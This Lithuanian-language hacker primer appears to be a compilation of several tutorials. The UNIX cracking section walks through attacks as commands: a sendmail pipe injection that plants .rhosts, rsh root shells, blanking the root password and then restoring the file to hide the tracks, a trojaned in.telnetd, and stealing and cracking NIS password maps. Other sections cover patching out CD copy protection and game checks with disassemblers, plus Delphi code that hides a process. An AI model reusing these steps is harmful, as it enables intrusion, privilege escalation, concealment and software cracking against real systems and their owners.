Hakerio Pradziamokslis

print S <;

($DATA_IN !~ /^250/) && (&error(“SMTP EMAIL: Message send failed – try again – 250”));

print S “QUITn”;

8. Coll www

Pasidaryk šustrą puslapi Pasidarei shustra puslapi? Apie ka jis? Nuogas merginas, mashinas, kompiuterius, ju lauzhyma. Na nesvarbu. Svarbu, kad tavo www yra geras ir todel tau reikes ji patalpinti geoj vietoj ( kalbu ne apie kuno daly :). Internetas dabar prikimshtas visokiu redirektu, vietu puslapiams bei kitu patogiu dalykeliu. Shiame straipsnyje ash papasakosiu kaip atsikratyti daugelio nervinanchiu baneriu, kur patalpinti savo puslapi, kur gauti gera redirekta ir net kaip uzh veltuj gauti DOMANA! Pradekime nuo patalpinimo. Shtai tarkim hypermart.net. Duoda tau adresa “vardas.hypermart.net”. Galesi siusti 20 megu, bet kiekvienam tavo puslapyje metys labai nervinanti baneri, kurio labai paprasta atsikratyti.

9. CRACK

Sitame tutoriale, as jums parodysiu kaip nulauzti, CD apsauga, naudojant Win32Dasm ir Hiew.

Na ka, pradedam:

Visu pirma, jus privalote paleisti ta zaidima, kuri jus norite nulauzti, be CD. Na aisku zaidimas nepasileis, (Prasau tik nepanikuokite:), viskas, ka jus pamatysite tai, isokanti lanaga kuris pranesa “gera naujiena”. Na ka si zinute tai tikrai gera naujiena, nes ji mums ir pades patvarkyti ta nelemta zaidima, taigi viskas ka jus siuo metu turite atsiminti, tai ta zinute, kuri jums pranese, kad reikalingas CD. Pavyzdziui: Please insert the – CD, arba: You need the CD to play the *** .( ***, yra zaidimo pavadinimas, kuri jus norite nucrackinti). Beje jei jus esate su ribotu atminties kiekiu savo galvoje, ir nesugebate atsiminti sios zinutes kuri praso CD, tai uzsirasykite ja, ant kokio nors popiergalio. Taigi dabar pasileiskite Win32Dasm, ir atsiradusiame lange paspauskite DISASSEMBLE, po to isokusiame meniu, pasirinkite OPEN FILE TO DISSASSEMBLE. Atsiras kitas langas, kuriame jus turesite susirasti to zaidimo exe faila, kuri norite nucrackinti. Kai tai atliksite, prades begti tokia eilute, taigi tai ustruks kelias minutes, taigi siulau pramankstinti savo kojeles ir patraukti kur karaliai pesti vaiksto:).

Na ka baigesi? NE, na gerai dar palaukim, na kaip dabar? na OK procesas baigtas. Dabar jusu ekrane turejo atsirasti keistas tekstas, kurio mes visiskai nesuprantam:). Nesijaudinkite, vienintelis dalykas kuri dabar jus turite padaryti, tai susirasti antra mygtuka esanti is desines (String Data Reference), kuris yra salia printerio mygtuko. Dabar jus matote langa kuriame surasytos ivairios zinutes ir panasiai. Taigi susiraskite ta zinute kuri prase CD ir paspauskite du kartus ant jos. Uzdarykite STRING DATA REFERENCE langa. Dabar jus esate nebe kodo pradzioje, o kazkur viduryje ar kazkas tokio, kiekvienu atveju vis kitaip. Taigi dabar jusu ekrane turi matytis ta zinute kuri praso kompakto. Dabar pati svarbiausia vieta. Kilkite i virsu, nuo tos zinutes, kol pamatysite kazka panasaus:

* Referenced by a (U)nconditional or (C)onditional Jump at Address:

|:00410545 (c)

|

Jusu atveju skaicius bus aisku kitoks, bet bendras vaizdas turi buti panasus. Susirade tai, paspauskite Goto(Win32Dasm virsuje), atsiradusiame meniu pasirinkite Goto Code Location ir parasykite si skaiciu, mano atveju tai 00410545 ir spauskite OK. Taigi jus vel kazkur nusokote, dabar nejudedami is vietos, nusirasykite skaiciu esanti Win32Dasm apacioje, kuri atrodo taip (isskyrus skaiciai):

Line:34040 Pg 401 of 409 Code Data @:0041052F @offset 0000F945h in File:

Vienintelis dalykas kurio mums reikia tai skaicius einantis po @offset, ne po @ bet po @offset na tik -h-nebereikia. Taigi mano atveju man bus reikalingas 0000F945 skaicius, jusu atveju, kitas(jau kartoti atsibodo) taigi dabar nusirase si skaiciu, paliekame Win32Dasm ir einame dabar prie HIEW. Hiew’e pasirenkame mus reikalinga EXE faila. Dabar spaudziame F4 ir pasirenkame Decode, paskui seka F5 paspaudimas. Taigi dabar parasome musu skaiciu, mano atveju, kaip zinome yra 0000F945 Dabar spaudziame enter, ir BOOM mes toje vietoje kur ir norime buti. Bet dabar as jums noriu pasakyti pagridndinius asemblerio kalbos JUMPUS:

ASM. —Ka reiskia

—————————————————————-

jne —Ivyksta suolis jei nelygu

je —Ivyksta suolis jei lygu

jmp —Bet kokiu atveju ivyksta suolis

nop —Nieko neatlieka(no operation)

ja —Ivyksta suolis jei virsuje

jna —Ivyksta suolis jei nevirsuje

jae —Ivyksta suolis jei virsuje arba lygu

jnae —Ivyksta suolis jei nevirsuje arba lygu

jb —Ivyksta suolis jei zemiau

jnb —Ivyksta suolis jei nezemiau

jbe —Ivyksta suolis jei zemiau arba lygu

jnbe —Ivyksta suolis jei nezemiau arba lygu

jg —Ivyksta suolis jei didesnis

jng —Ivyksta suolis jei nedidesnis

jge —Ivyksta suolis jei didesnis arba lygu

jnge —Ivyksta suolis jei nedidesnis arba lygu

jl —Ivyksta suolis jei mazesnis

jnl —Ivyksta suolis jei nemazesnis

jle —Ivyksta suolis jei mazesnis arba lygu

jnle —Ivyksta suolis jei nemazesnis arba lygu

—————————————————————-

Zinoma as suprantu, tai gali atrodyti is pradziu keblu, as pamenu, kai pats pirma karta tai pamaciau, O dieve galvojau, ir ka as cia bandau ismokti :)), bet kaip sakant kas bando tam ir pavyksta. Bet dabar jums tereikia pakeisti: Jei dydesnis, tai keiciate i Jei nedidesnis, tai yra jei yra JNE keiciate i JE ir atvirksciai, o linksmiausia dalis tame, kad netgi daugelis programu yra apsaugotos tokiu budu:). Taigi as dabar stoviu:

0000F945: 751D jne 0000F964

Taigi kaip jau supratote man reikia pakeisti, JNE i JE . Dabar jus pasakysite:”Na tai kas, kad as zinau ka i ka reikia keisti, bet KAIP man tai padaryti???” Taigi sakau reikia paprasciausiai pakeisti viena skaiciu, vienu daugiau arba vienu maziau. Taigi pas manes yra skaicius 751D ir JNE. Norint is JNE padaryti JE as turiu pakeisti 751D i 741D. O jei butu pas manes JE tai tureciau atvirksciai ne atimti, bet prideti prie 5 . Kartais buna, kad reikia isviso panaikinti operacija taigi, parasydami NOP vietoj JNE ar kas bebutu, tai darome parasydami 90 beje, jei jau mes turime atjungti operacija(NOP), tai isidemekite, kiek skaiciu turi ta eilute, Win32Dasme ant kurios mes stovejome, kai atlikome funkcija Go to code location isidemekite antra skaiciu is kaires, toje eiluteje kur stovite. Jei skaicius pavyzdziui yra 751D tai ji keiciame 9090, jei 751D000000 tai ji turime pakeisti i 9090909090 vienu zodziu turime pakeisti skaiciu i skaiciu. Beje kai Hiew’e jus rasysite 90 nekreipkite demesio, kad eilute nusoka, paprasciausiai surasykite tiek 90 kiek reikia ir viskas.

Norint kad mums leistu keisti kanors, paspauskime F3 ir galime irasineti, o kai baigsite rasyti , tai paspauskite F9 – uzfiksavimui ir F10 – isejimui, ir viskas. Kartais buna, kad neiseina ne vienas auksciau isvardytas variantas. Tada paprasciausiai susirasykite visu JUMP’u @offset numerius einancius nuo zinutes i virsu ir juos keitaliokite, juk niekada negali buti uztikrintas kuris JUMP’as reikalingas.

PS: shis tutorialas yra sudetas ish keliu ir viskas surishta mano pachio mintimis;)

10. UNIX Cracking

Pvz No1.

crack% telnet target.remote.com 25

Connecting to 123.456.654.321.

! prisijungiam prie 25 porto – tai SMTP

220 sendmail SMI/4.3.5.2 ready

! versija kaip zhinome turi buga.

helo xxx

220 Helo xxx, ( crack.edu )

mail from: |echo crack.edu/.rhosts@target.remote.com

! statome komanda vietoj atgalinio adreso.

200 Sender ok.

rcpt to: nosuchuser

! ivedam ishanxto neteisinga adresata

500 nosuchuser: user unknown

! nekreipdami demesio i praneshima tesiame dialoga .

dataŽ

230 Enter mail, end with .

200 Mail accepted

! viskas mashina nulauzhta..

quitŽ

crack% su

! dabar ilendam taip kad musu nebutu matyti per who

# rsh target.remote.com /bin/csh -i

Welcome to remote.com!

Warning! No access to terminal, job control disabled!

target#

Pvz No2.

crack# su – bin

$ rsh target.remote.com /bin/csh -i

! Faile /etc/hosts.equiv yra uzhrashas + ir klaida.

Welcome to remote.com!

! Katalogas /etc su savininku bin.

Warning! No access to terminal, job control disabled!

% ls -ldg /etc

drwxr-xr-x 10 bin bin 1536 Apr 10 01:45 /etc/

% cd /etc

! Darom kad mums galima butu editinfi passwd .

% mv passwd passwd.was

% cp passwd.was passwd

! redaguojam

% ed passwd

2341Ž

1p

root:Nkkh5gkljGyj:0:0:Root:/:/bin/csh

s/Nkkh5gkljGyj//p

root::0:0:Root:/:/bin/csh

w

2341

q

! Ir super useryje.

%echo /bin/csh -i | su root

Warning! No access to terminal, job control disabled!

target# mv /etc/passwd.was /etc/passwd

! Kad niekas nepastebetu ka mes dareme.

Pvz No3.

crack% showmount -e target.remote.com

Export list for target.remote.com

/home Everyone

/disk3 neptun pluton alpha

! Domeininej katalogaj prieinami per NFS

crack% su

# mount -t nfs target.remote.com:/home /mnt

# cd /mnt

! Mountinam kataloga sau

# ls -ldg *

drwxr-xr-x 10 257 20 1536 Apr 10 01:45 user/

# echo crack.eduŽ user/.rhosts

! Idiegiam .rhosts pas pas userius

# catŽ /etc/passwdŽ

user::257:20::/:

^DŽ

! sukuriam toki pati pas mumi

# su – userŽ

! Tampam juo

$ rsh target.remote.com /bin/csh -i

Warning! No access to terminal, job control disabled!

!Ir einam i svechius -)

% id

uid=257(user) gid=20(stuff) groups=20(stuff), 7(sys)

% ls -ldg /usr/etc

! Katalogas prieinamas writinimuj

drwxrwxr-x 10 bin bin 1536 Apr 10 01:45 /usr/etc

% grep telnet /etc/inetd.conf

telnet stream nowait root /usr/etc/in.telnetd in.telnetd

!Radom programike kuri pasileis

!per roota ish musu katalogo

% cd /usr/etc

% mv in.telnetd in.telnetd1

! sukuriam trojana

% catŽ in.telnetd

#!/bin/sh

exec /bin/csh -i

^D

% chmod 755 in.telnetd

! ir paleidzhiam ji

% telnet 127.1

Connecting 127.1.

Warning! No access to terminal, job control disabled!

# chown user /etc;

! Darom /etc savu

^M: command not found

# exit;

^M: command not found

Connection closed by foreign host.

% cd /etc

! o toliau kaip in Pvz No1.

....

Pvz No4.

! chekinam ar yra NIS Ž

crack% rpcinfo -p target.remote.com | grep bind

120000 2 udp 2493 ypbind

! yra toxaj ..

crack% ypx -o target.passwd -g target.remote.com

! pasimam paswordu faila

crack% crack target.passwd

! leidzhiam passwd ieshkokli

[ a lot of time ]

OK, user user has password iamuser

! radom, uzheinam

crack% telnet target.remote.com

! toliau viska kaip kad prieshtai buvusiam pvz .

..

– Hex –

(imti pvz, versta, kurta , bla bla bla rezultatas priesh akis)

Shitie budai yra pakankamai seni ir vieni ish primytiviausiu bet . heh

susipazhinkit su principu nes yra tokiu kurie net neisivaizduoja kaip yra

daromi tokie darbai ir uzhduoda tokius klausimus . mazhdaug su kokia

programele tu crackini ? ;

Informacion rulez and if u rule information ...

11. Delphi

Sios komandos skirtos programavimo kalbai – Delphi. Jos isbandytos su

5.0 versija.

..by ZErOnE

zerone@xxx.lt

______________________________________________________________________

1. Shut Down, Reboot, Standby funkcijos:

ExitWindowsEx(EWX_SHUTDOWN,0); { ShutDown }

ExitWindowsEx(EWX_REBOOT,0); { Reboot }

ExitWindowsEx(EWX_POWEROFF,0); { Standby }

______________________________________________________________________

2. Gauti pc IP adresa:

uses winsock;

.

function GetIPAddress: string;

var

phoste:PHostEnt;

Buffer:array[0..100] of char;

WSAData:TWSADATA;

begin

result:=”;

if WSASTartup($0101, WSAData) <> 0 then exit;

GetHostName(Buffer,Sizeof(Buffer));

phoste:=GetHostByName(buffer);

if phoste = nil then

begin

result:=’127.0.0.1′;

end

else

result:=StrPas(inet_ntoa(PInAddr(phoste^.h_addr_list^)^));

WSACleanup;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Label1.Caption:=GETIPAddress;

end;

______________________________________________________________________

3. Gauti win’u ir system foldery:

function GetWinDir: String;

var

dir: array [0..max_path] of char;

begin

GetWindowsDirectory(dir, max_path);

result:=StrPas(dir);

end;

function GetSysDir: String;

var

dir: array [0..max_path] of char;

begin

GetSystemDirectory(dir, max_path);

result:=StrPas(dir);

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

label1.caption:=GetWinDir;

label2.caption:=GetSysDir;

end;

______________________________________________________________________

4. Sisteminiu klavisu isjungimas/yhungimas (Alt+Tab, Alt+Ctrl+Del) :

var OldVal: LongInt;

begin

SystemParametersInfo (97, Word (True), @OldVal, 0); //disable

SystemParametersInfo (97, Word (False), @OldVal, 0); //enable

end;

______________________________________________________________________

5. Pakeisti background’a :

SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, PChar(‘C:pvz.BMP’), SPIF_SendWININICHANGE);

______________________________________________________________________

6. Pakeisti peles pozicija :

SetCursorPos(600,600);

______________________________________________________________________

7. Gauti ScreenShot’a :

function GetScreenShot:TBitmap;

var

Desktop:HDC;

begin

Result:= TBitmap.Create;

Desktop:= GetDC(0);

try

try

Result.PixelFormat:=pf32bit;

Result.Width:=Screen.Width;

Result.Height:=Screen.Height;

BitBlt(Result.Canvas.Handle,0,0,Result.Width,Result.Height,Desktop,0,0,SRCCOPY);

Result.Modified:=True;

finally

ReleaseDC(0,Desktop);

end;

except

Result.Free;

Result:=nil;

end;

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

Image1.Picture.Bitmap:=GetScreenShot;

end;

______________________________________________________________________

8. Darbas su .ini failais :

uses inifiles;

.

var ini: TIniFile;

.

var reiksme1:string; {nuskaitymas}

begin

reiksme1:=ini.ReadString(‘Section’,’Edit1′,”);

label1.caption:=reiksme1;

end;

ini.WriteString(‘Section’,’Edit1′,edit1.text); {yrasimas}

procedure TForm1.FormCreate(Sender: TObject);

begin

ini:= TIniFile.Create(‘c:test.ini’); {.ini failo sukurimas}

end;

______________________________________________________________________

9. Enable/Disable Start mygtuko :

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), TRUE); {enable}

EnableWindow(FindWindowEx(FindWindow(‘Shell_TrayWnd’, nil), 0, ‘Button’, nil), FALSE); {disable}

______________________________________________________________________

10. paslepti/grazinti desktop’a :

ShowWindow(FindWindow(nil,’Program Manager’),SW_HIDE); {paslepti}

ShowWindow(FindWindow(nil,’Program Manager’),SW_SHOW); {grazinti}

______________________________________________________________________

11. Programos paslepimas :

const

RSP_SIMPLE_SERVICE = 1;

RSP_UNREGISTER_SERVICE = 0;

var

function RegisterServiceProcess(dwProcessID, dwType: DWord):

DWord;stdcall;external ‘Kernel32.dll’ name ‘RegisterServiceProcess’;

{Ushsidek taimeri su intervalu 1}

procedure TForm1.Timer1Timer(Sender: TObject);

begin

Timer1.Enabled := False;

Form1.Visible := False;

RegisterServiceProcess(GetCurrentProcessID,RSP_SIMPLE_SERVICE);

Brush.Style := bsClear;

end;

{o kai uzdarysi forma daryk taip:}

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

RegisterServiceProcess(GetCurrentProcessID,RSP_UNREGISTER_SERVICE);

end;

_______________________________________________________________________

12. Kopijuoti/Perkelti/Trinti folderius :

uses shellapi

.

function copydir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_COPY;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function movedir(von,zieldir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_MOVE;

fFlags := FOF_FILESONLY;

pFrom := PChar(von+#0);

pTo := PChar(zieldir)

end;

Result:=(0=ShFileOperation(fos));

end;

function deldir(dir: String): boolean;

var fos: TSHFileOpStruct;

begin

ZeroMemory(@fos, SizeOf(fos));

with fos do begin

wFunc := FO_DELETE;

fFlags := FOF_SILENT or FOF_NOCONFIRMATION;

pFrom := PChar(dir+#0);

end;

Result:=(0=ShFileOperation(fos));

end;

procedure TForm1.Button1Click(Sender: TObject);

begin

if copydir(‘c:mp3′,’c:xxx’)=true then

begin

ShowMessage(‘Dir copied.’);

end;

end;

______________________________________________________________________

12. Freecell for Windows 98 SE krekinimas

Info:

Autorius: PauliuZ (pauliuz@xxx.lt, www.pauliuz.cjb.net)

Irankiai: SoftICE, Betkoks šešioliktainis redaktorius (http://ucol.home.lt/cgi-bin/ucol.pl?l_tools)

Taikinys: Žaidimas „Freecell“

Intro:

Šis tekstas yra skirtas tiktai mokslo tikslams ir teksto autorius neatsako už netinkamą jo naudojimą! O dabar jau galime pradėti :]

Kam gi reikia krekinti „Freecell“? Jeigu žaidžiame šį žaidimą ir mums niekaip nesiseka jį sužaisti, taigi mes norime iš jo išeiti ir vėl pradėti iš naujo, bet išeinant pamatome dialogą: „Are you sure you want to quit this game?“. Jeigu spaudžiame „Yes“, tai mums užskaitomas pralaimėjimas, o mes to visai nenorime :] Todėl reikia padaryti, kad tas dialogas visai neiššoktų ir nebūtų užskaitytas pralaimėjimas.

Pora sakinių:

Būtų gerai, kad jūs turėtumėte bent „žalią” supratimą apie SoftICE, šešioliktainius redaktorius ir assembler kalbą. Bandysiu paaiškinti bent jau pagrindines SoftICE klavišų kombinacijas ir jos suderinimą.

Suderinimas:

SoftIce yra paleidžiama iš autoexec.bat paskutineje eilutėje įrašius: [kelias iki SoftIce]winice.exe. Pvz.: C:SoftICEWinIce.exe, todėl SoftIce pasileidžia kraunantis windowzei.

Taip pat reikia suderinti ir winice.dat failą. Pateiksiu winice.dat failo fragmentus, kurie turi buti (daugtaškiai reiškia praleistas vietas):

.

INIT=”CODE ON; X;”

.

EXP=c:windowssystemkernel32.dll

EXP=c:windowssystemuser32.dll

EXP=c:windowssystemgdi32.dll

.

Kombinacijos:

Ctrl+D – įeiti į SoftICE;

F5 – įšeiti iš SoftICE;

F10 – vykdyti programą po vieną eilutę;

F8 – jeigu esame ant procedūros, įeiti į ją.

Krekinimas:

Jūs laisvai galite nukrekinti ir „Freecell“ iš windows 95, ten viskas labai panašu, nes kiek žiūrėjau failų dydžiai skiriasi tik keliais baitais.

Įeiname į žaidimą (StartProgramsAccessoriesGamesFreecell). Paleidžiame jį (GameNew Game). Bandome išeiti iš jo. Pamatome dialogą: „Are you sure you want to quit this game?“. Spaudžiame „No“ (juk nenorime pralaimėti :)). Einame į SoftICE (Ctrl+D). Rašome: bpx messagebox. Išeiname iš SoftICE (F5). Vėl bandome išeiti. Aktyvuojasi SoftICE. Spaudžiame F11 (išėjimas iš proceduros). Pasirodo dialogas. Spaudžiame „No“. Vėl aktyvuojasi SoftICE. Štai ką matome:

.

:03D8 68D604 push ds ;dialogo parametras

:03DB 1E push 56c ;dialogo parametras

:03DC 686C05 push ds ;dialogo parametras

:03DF 6A24 push 24 ;dialogo parametras

:03E1 9A00009717 call user!messagebox ;iškviečiame dialogą

:03E6 3D0700 cmp ax,0007 ;ar buvo paspausta „No“

:03E9 0F846E04 jz 085b ;jeigu paspaudėme „No“ nedarom nieko

:03ED E8FE1A call 1eee ;užskaitome pralaimėjimą

:03F0 E80734 call 38ca ;užskaitome pralaimėjimą

:03F3 E9BFFE jmp 02b5 ;nošokame į išėjimą

.

Užsirašome pilkai pažymėtys baitus (68D6041E686C056A24). Jų mums prireiks vėliau. Taigi mums reikia praleisti dialogą ir pralaimėjimo užrašymą ir iš karto nušokti į išėjimą. Tuo mums puikiai pasitarnauja pirmasis dialogo parametras, kuris užima tiek baitų kiek ir išėjimo komanda (jmp 02b5). Todėl tą dialogo parametrą (push ds) reikia pakeisti komada jmp 02b5. Rašome: bpx 3d8. Tai reiškia, kad SoftICE sustos toje vietoje, kai bus bandoma užkrauti pirmą dialogo parametrą. Išeiname iš SoftICE (F5). Bandome išeiti iš žaidimo. Aktyvuojasi SoftICE ties pirmu dialogo parametru. Rašome: a (tai reiškia, kad mes pakeisime komandą push ds kita). Dabar rašome jmp 02 b5 (keičiame komandą). Spaudžiame Enter, paskui Escape. Štai ką matome:

.

:03D8 E9DAFE jmp 02b5 ;nošokame į išėjimą

:03DB 1E push 56c

:03DC 686C05 push ds

:03DF 6A24 push 24

:03E1 9A00009717 call user!messagebox

:03E6 3D0700 cmp ax,0007

:03E9 0F846E04 jz 085b

:03ED E8FE1A call 1eee

:03F0 E80734 call 38ca

:03F3 E9BFFE jmp 02b5

.

Pasikeitė trys baitai, užsirašome raudonai pažymėtus (pasikeitusius) baitus (E9DAFE). Išeiname iš SoftICE (F5). Kartu su SoftICE užsidarė žaidimas ir nebuvo jokio dialogo. Einame į šešioliktainį redaktorių, atidarome faila freecell.exe, vykdome paiešką pagal pilkai pažymėtus užsirašytus baitus. Suradę juos, tris pirmus pakeičiame į raudonai pažymėtus užsirašytus baitus (E9DAFE), išsaugome failą. Išeiname iš šešioliktainio redaktoriaus.

Pabaiga:

Viskas žaidimas „nukenksmintas“. Pabandykite paleisti jį, šiek tiek jame pažaisti ir išeiti. Ką matote? Jokio dialogo išeinant! Vėl įeiname į žaidima, pažiūrime į rezultatus. Rezultatai tokie patys, pralaimėjimas neužskaitytas! Bet žaidimas iki galo dar nenukrekintas, nes dialogas atsiranda vykdant žaidimo meniu komandą „GameNew Game“ antrą kartą. Šitą dialogą pabandykite nukrekinti patys.

13. Domenas dykai

Nemokamos domainu dalintojos namezero hakas

Turbus daugelis zinot kompanija namezero

http://www.namezero.com

kuri nemokamai jums duoda domaina (com, net, org). Bet yra trukumas- ji jusu puslapio apacioje padaro frame`a, kuris gadina visa vaizda.

Pabandykime pagalvoti kaip jis padaro sita visa mesla. As manau jis daro taip: sukuria html dokumenta, kuris suskirstytas i du frame`us, kuriu vienas ira jusu svetaines tikrasis adresas, kitas namezero reklama.

Pasirodo to galima isvengti. Kaip taipadaryti?

I pagalba ateina JavaScript: jus savo puslapio titulineme dokumente iterpete JavaScript`uka, kuris jusu frame`a sulauzo, t.y. padaro per visa page`a. stai kaip atrodo sitas scriptas:


<script language=”JavaScript”>

<!– Slepeme nuo narsykliu, kurios nesupranta JavaScript

// Copyright © 2000 uid=o

// Created by SaTaN

//www.zemrsn.lt/uid0

if (self.parent.frames.length != 0)

self.parent.location=”index.html”;

//vietoj index.html galite/privalote rasyti jusu norima dokumenta, kuri suaktyvinus dingsta visi frame`ai

// –>

</script>


Kuo sitas budas yra blogas?

Nevisos narsykles supranta Javasript ir nevisi narsykleje JavaScript yra ijunge.

Beto jei jus norite issivaduoti tik is to namezero frame`o, o kitus, savo puslapio frame`us paliktitai jums neisdeks.

Iseitis: nenaudokite savo puslapyje frame`u arba padarykite izangini puslapi i jusu frame`ini puslapi, kureme ir bus visas frame`u zydymas.

Demonstracija viso sito galite pamatyti cia:

http://www.userid0.org

Tai yra uid=0 domainas, su nukilintu frame`u.

-=Visa sitai nera versta, kopijuota ar kitai pasisavinta is kitu dokumentu, saitu. Visa tai tik uid=0 sugalvota=-

14. FTP totorial`as

FTP (file transfer protocol)- failu perdavimo protokolas. Naudojantis siuo protokolu galima ivairia informacija failu pavidalu perduoti is vieno kompiuterio i kita, nepriklausomai nuo atstumo tarp kompiuteriu ar ju operaciniu sitemu. Tai vienas is budu perkelti jums reikalinga informacija is kito kompiuterio i savaji ir atvirksciai.

-= FTP reikalingas: =-

Padeti sureguliuoti failu (programu arba/ir duomenu) paskirstyma

Suteikti galimybe tiesiogiai ar netiesiogiai naudotis sistemos resursais

Apriboti vartotojo is kitos sistemos navigacija nutolusioje sistemooje

Efektyviai ir patikimai perduoti duomenis isvienos sistemos i kita

Failu perdavima is vienos sistemos i kita relizuoja dvi programos, naudojancios FTP protokola: programa-serveris, kuri veikia tolimoje sistemoje, ir programa-klientas, kuri aptarnauja norincius pasiimti/duoti failus tolimai sistemai.

Programa-serveris laukia uzklausos ir po to specialiu protokolu realizuoja failu siuntima is/i tolimos sistemos i/is prisijungusiji kompiteri ir taip pat aptarnuoja programa-klienta, t.y. priima ir siuncia specialias ftp komandas.

Programa-klientas prisijungia prie tolimos sistemos, siuncia failus is/i tolima sistema, kuria patogia (arba ne) vartotojo aplinka ir dialogus su vartotoju, transformuoja vartotojo komandas i standartinu ftp komandu seka ir perduoda ja kaip uzklausa ar atsakyma i uzskausa programai-serveriui.

Prisijunge prie tolimos sistemos, jus igaunate dauguma teisiu, kurias turetumete, jei naudotumetes TELNET (aisku prgramu vykdyti ar tikrinti pasto etc neiseis). Bet jus galesite trinti, perkelti, kopijuti etc failus (aisku jei jus turesite tam tikrus leidimus). Jusu teises priklauso nuo sistemos konfiguracijos ir aisku jusu vartotojo vardo (USERNAME).

Prisijungus prie kokio tai FTP serverio jus turite prisistatyti, t.y. nurodyti savo vartotojo varda (username) ir slaptazodi (password). Dauguma serveriu leidzia prisijungti su Anonymouse ar ftp vartotojo vardu (kur password buna jusu email). Tada jusu teises priklauso nuo serverio admino, bet dazniausiai jus tegalite failus tik parsiusti (kartais leidziama ideti failus i incoming kataloga).

Jei naudojates ne visualiu ftp klientu, tai jums reikes zinoti keleta komandu:

pwd – Parodo kokiame kataloge yra siuo metu vartotojas (t.y. jus)

cd – Keicia kataloga, kuriame jus esate

mkdir – Sukuria kataloga

rmdir – Istrina kataloga.

rename – Pervardina faila.

delete – Be komentaru

get – Parsiunce faila is tolimos sistemos i jusiske

put – Siunce faila is jusu sistemos i tolima

FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

http://cert.org

http://www.iss.net/cgi-bin/xforce/xforce_index.pl

http://packetstorm.genocide2600.com

http://www.rootshell.com

http://www.slashdot.org

15. FTP Tutorial 2

DIDELIS FTP TUTORIALAS NAUJOKAMS IR NE TIK

=====================================================================

Sveiki, shiame tekste aprasysiu, kas yra FTP, kam jis naudojamas, keleta terminu ir siaip idomiu dalyku. Pirmiausia, tai jei tau yra labai nepatogu skaityt si teksta (ar kitus) kur reikia vazinet tai i kaire, tai i desine, tai tai yra todel, kad pas tave nepadarytas word wrap. Ji gali padaryt edit/word wrap.

DISKLEIMERIS:

=====================================================================

Man yra visiskai nesvarbu, ka tu darysi paskaites si teksta, bet jei padarysi ka nors negero kaltink tik pats save, nes as ji rasiau tik tam, kad galetum apsisviest. >)

=====================================================================

TURINYS:

=====================================================================

1.0–Kas yra FTP ir kuo jis yra geras

2.0–FTP komandos

3.0–FTP hacking’as

4.0–Keletas FTP bugu

5.0–Keletas terminu naujokams

=====================================================================

1.0 :

FTP (file transfer protokal) lietuviskai butu failu siuntimo protokolas. FTP serveriai leis tau ieiti su User Anonymous, o vietoj passwordo reikes irasyt savo e-maila. Aisku, jei tu turi useri ir zinai user passworda, tai geriau jungtis taip. Jei pasijungsi su Anonymous, tai tu turesi tik read-access. Taip pat galesi matyt tik labai ribota kieki failu. Jei turi ten useri, tai turetum turet tada ir write-access. Tuomet galetum matyt visus isskyrus root-accsess fileus. FTP yra labai geras dalykas, nes kai prisijungi prie FTP serverio, po ji gali vaiksciot kaip po savo kompa. Windowsams labai gera programa yra WS_FTP, nes ji labai patogi valdyti, ir langas, kuriame matai FTP serverio kompa bus panasus i Norton Commander langa. WS_FTP gali atsisiut is www.tucows.com arba kiek zinau ji yra ir mail.tiltas.lt FTP serveryje. FTP naudoja 21 porta.

=====================================================================

2.0 :

Jei prie FTP servo jungies per DOS ar UNIX komanda FTP, tai tada turesi rinkt keleta tokiu komandu, jei noresi paziuret, nusiust ar atsisiut failus:

cd kaip ir UNIXe ar DOSe ji keicia direktorijas (folderius) kompe, kuriame esi

lcd ji keicia tavo kompe direktorijas

dir/ls parodo direktorijas ir failus, kurie yra direktorijoj kurioj esi

get atsisiuti faila

mget atsisiusti daug failu

put nusiusti faila

mput nusiusti daug failu

pwd paraso, kurioje direktorijoj tu esi

=====================================================================

3.0 :

FTP serveriuose yra labai daug skyliu, del juose esanciu programu, operaciniu sistemu. Dabar duosiu keleta linku, kuriuose galesi issiaiskint sias skyles.

FTP exploitus gali rasti siuose saituose:

cert.org

www.iss.net/cgi-bin/xforce/xforce_index.pl

packetstorm.genocide2600.com

www.rootshell.com

www.slashdot.org

Sie saitai nera illegalus. Jie yra legalus ir jie paprasciau paaskina, kokios skyles gali buti jusu kompe ir panasiai.

Taip pat gali subscribeintis bugtraqe. Cia yra labai gera konferencija, tiems, kas domisi OS, ir programu exploitais, bugais. www.securityfocus.com

Siuose saituose tau reiktu ieskoti zodziu, tai yra OSu, programu. Pvz.: pasijungiu prie servo, ir matau, kad jis naudoja Mandrake Linux. Tada eini i kuri nors is isvardintu saitu, ir i searcha (ar kur kitur) Mandrake Linux 2.2.13. Tada ten gaunat keleta exploitu ir galbut iseis jums gauti root access!!! Bet aisku turbut apie tai tik svajot. Nu nesvarbu. Jei nori suzinot FTP servo naudojama OS, bandyk jungtis su telnet’u per porta 21, 22, 23, 25. Ir panasiai. Taip pat per 25 porta jei iseis pasijungt, tai suzinosi ir naudojama Send-mail programa. O kaip zinoma, send-mail programos turi ivairiu exploitu.

=====================================================================

4.0 :

Keletas siu bugu yra paprastos padarytos klaidos, ir jie nera kokie nors fantastiski. Jie cia yra surasyti tik tam, kad tu jei esi naujokas, galetum susipazinti su keletu exploitu.

Sie bugai yra paimti ne is kokiu nors dideliu hacking saitu, o is paprastu homepageu, kurie pamoko, kaip savoj sistemoj istaisyt klaidas.

1-bugas. FTP Bounce Attack (jis yra per ilgas, nueik i http://www.netspace.org/cgi-bin/wa?A2=ind9507B&L=bugtraq&P=R1425)

2-bugas. Bet kas is isores galetu isjunkt FTP serveri. Ir jei dar FTP servas naudoja win 3.1 systema tikrai nusicrash’ins.

Programa: WinQVT/NET (tinka visos versios)

